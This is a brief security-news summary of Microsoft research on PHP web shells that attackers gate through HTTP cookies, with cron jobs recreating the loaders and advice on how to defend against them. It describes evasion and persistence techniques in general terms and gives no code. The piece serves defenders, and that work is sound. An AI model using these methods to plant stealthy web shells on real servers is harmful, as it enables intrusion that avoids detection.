Microsoft Defender Security Research Team found that threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers to enable remote code execution while remaining dormant during normal traffic. The technique leverages cookie-gated activation, obfuscation, and cron-based recreation to create a self-healing persistence mechanism that evades many traditional inspection and logging controls. #MicrosoftDefender #PHPWebShell
Keypoints
- Threat actors use HTTP cookies as a stealthy gate for PHP web shells, avoiding URL parameters and request bodies.
- Attackers leverage the $_COOKIE superglobal to pass instructions and trigger execution without additional parsing.
- Implementations include obfuscated PHP loaders, cookie-segmented payload reconstruction, and single-cookie markers that execute or upload files.
- Persistence is achieved via cron jobs that recreate removed loaders, forming a self-healing remote code execution channel.
- Microsoft recommends MFA for control panels and SSH, monitoring unusual logins, auditing cron jobs, checking web directories for suspicious files, and restricting shell execution.
Read More: https://thehackernews.com/2026/04/microsoft-details-cookie-controlled-php.html